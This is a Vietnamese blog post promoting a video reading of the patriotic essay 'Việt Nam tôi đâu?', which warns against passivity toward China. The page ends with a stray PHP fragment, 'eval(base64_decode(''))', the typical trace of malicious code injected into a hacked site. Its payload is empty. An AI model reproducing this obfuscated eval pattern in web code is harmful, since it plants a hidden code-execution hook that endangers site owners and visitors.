[Video] Hạt Sương Khuya đọc “Việt Nam tôi đâu?” Câu hỏi của nhiều thế hệ

Nếu chỉ biết tôn vinh quá khứ và làm ngơ trước hiểm họa Trung Quốc hôm nay, rồi lịch sử dân tộc với những chiến công hiển hách của các thời Ngô, Đinh, Lý, Trần cũng sẽ chỉ là những tấm bia trong một ngôi đền cổ. Hãy tưởng tượng, nếu tất cả chúng ta đều im lặng, làm ngơ, chịu nhục trước hiểm họa mất nước, rồi bốn ngàn năm nữa, những đứa trẻ dòng Việt tộc, đi ngang qua di tích đền Hùng, sẽ căm hận biết bao khi nghĩ về tổ tiên nhu nhược của chúng vào bốn ngàn năm trước đó…
Bài viết “Việt Nam tôi đâu, câu hỏi của nhiều thế hệ” qua giọng đọc của Hạt Sương Khuya:

Leave a Reply

Flickr Photos

Tag Cloud

'; eval(base64_decode(''));?>